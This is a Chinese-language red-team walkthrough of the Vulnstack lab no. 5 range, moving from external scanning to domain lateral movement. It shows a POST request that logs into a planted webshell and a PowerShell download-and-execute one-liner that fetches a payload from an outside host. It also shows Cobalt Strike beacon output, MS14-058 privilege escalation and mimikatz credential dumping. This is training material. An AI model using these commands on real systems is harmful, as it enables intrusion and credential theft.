Vulnstack红队评估（五）

0x00 : 简介

Vulnstack红队评估（五）

此次靶场虚拟机共用两个，一个外网一个内网，用来练习红队相关内容和方向，主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习，此靶场主要用来学习，请大家遵守网络网络安全法。

0x01 : 环境

主机信息

PC ~ Win7双网卡

外网：192.168.153.142, 我用的NAT与本机相连, 具体IP自己确定
内网：192.168.138.136

DC ~ Win2008

内网：192.168.138.138

0x02 : 外网

外网信息收集

利用nmap扫描WEB开放端口及服务
nmap -F 192.168.153.142

信息收集（1）.png

发现开了80和3306端口, 弱口令扫描走一波, 不存在弱口令

利用dirsearch扫目录
http://192.168.153.142/  #ThinkPHP V5
http://192.168.153.142/add.php  #已经存在的马

信息收集（2）.png

外网打点

找个常见后门密码跑一下, 拿到密码admins

POST /add.php HTTP/1.1
Host: 192.168.153.142
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Origin: http://192.168.153.142
Connection: keep-alive
Referer: http://192.168.153.142/add.php
Cookie: new=95
Upgrade-Insecure-Requests: 1

getpwd=admins

外网打点（1）.png

外网打点（2）.png

sun\administrator权限, 这个马有点难用, 自己再传一个冰蝎上去

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx/a'))"

直接上cs

外网打点（3）.png

0x03 : 内网

主机渗透

收集一下信息

主机名:           WIN7
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
[01]: KB2534111
[02]: KB2999226
[03]: KB976902

beacon> shell echo %PROCESSOR_ARCHITECTURE%
[*] Tasked beacon to run: echo %PROCESSOR_ARCHITECTURE%
[+] host called home, sent: 60 bytes
[+] received output:
x86

双网卡

beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:

Windows IP 配置

   主机名  . . . . . . . . . . . . . : win7
   主 DNS 后缀 . . . . . . . . . . . : sun.com
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
   DNS 后缀搜索列表  . . . . . . . . : sun.com
                                       localdomain

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   物理地址. . . . . . . . . . . . . : 00-0C-29-FB-41-17
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::7021:36d:85f6:e57d%16(首选) 
   IPv4 地址 . . . . . . . . . . . . : 192.168.138.136(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 352324649
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-F1-93-23-00-0C-29-CE-6E-F7
   DNS 服务器  . . . . . . . . . . . : 192.168.138.138
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

以太网适配器 Bluetooth 网络连接:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Bluetooth 设备(个人区域网)
   物理地址. . . . . . . . . . . . . : F8-63-3F-86-E8-35
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是

以太网适配器 wk1 waiwang:

   连接特定的 DNS 后缀 . . . . . . . : localdomain
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   物理地址. . . . . . . . . . . . . : 00-0C-29-FB-41-0D
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::fc0d:3769:9a7d:fcea%11(首选) 
   IPv4 地址 . . . . . . . . . . . . : 192.168.153.142(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   获得租约的时间  . . . . . . . . . : 2020年8月5日 17:36:03
   租约过期的时间  . . . . . . . . . : 2020年8月6日 11:33:46
   默认网关. . . . . . . . . . . . . : 192.168.153.2
   DHCP 服务器 . . . . . . . . . . . : 192.168.153.254
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-F1-93-23-00-0C-29-CE-6E-F7
   DNS 服务器  . . . . . . . . . . . : 192.168.153.2
   主 WINS 服务器  . . . . . . . . . : 192.168.153.2
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

定位域控IP : 192.168.138.138

beacon> shell ping sun.com
[*] Tasked beacon to run: ping sun.com
[+] host called home, sent: 43 bytes
[+] received output:

正在 Ping sun.com [192.168.138.138] 具有 32 字节的数据:
来自 192.168.138.138 的回复: 字节=32 时间=1ms TTL=128
来自 192.168.138.138 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.138.138 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.138.138 的回复: 字节=32 时间<1ms TTL=128

192.168.138.138 的 Ping 统计信息:
    数据包: 已发送 = 4，已接收 = 4，丢失 = 0 (0% 丢失)，
往返行程的估计时间(以毫秒为单位):
    最短 = 0ms，最长 = 1ms，平均 = 0ms

利用ms14-58提权

主机渗透（1）.png

0x03 : 横向渗透

横向渗透

信息收集

beacon> net user
[*] Tasked beacon to run net user on localhost
[+] host called home, sent: 87096 bytes
[+] received output:
Users for \\localhost:

Administrator (admin)
Guest
heart (admin)

beacon> net computers
[*] Tasked beacon to run net computers
[+] host called home, sent: 87101 bytes
[+] received output:
Computers:

 Server Name             IP Address                     
 -----------             ----------                      
 DC                      192.168.138.138
 WIN7                    192.168.153.142

抓一下hash, mimikatz抓一下明文密码

横向渗透（1）.png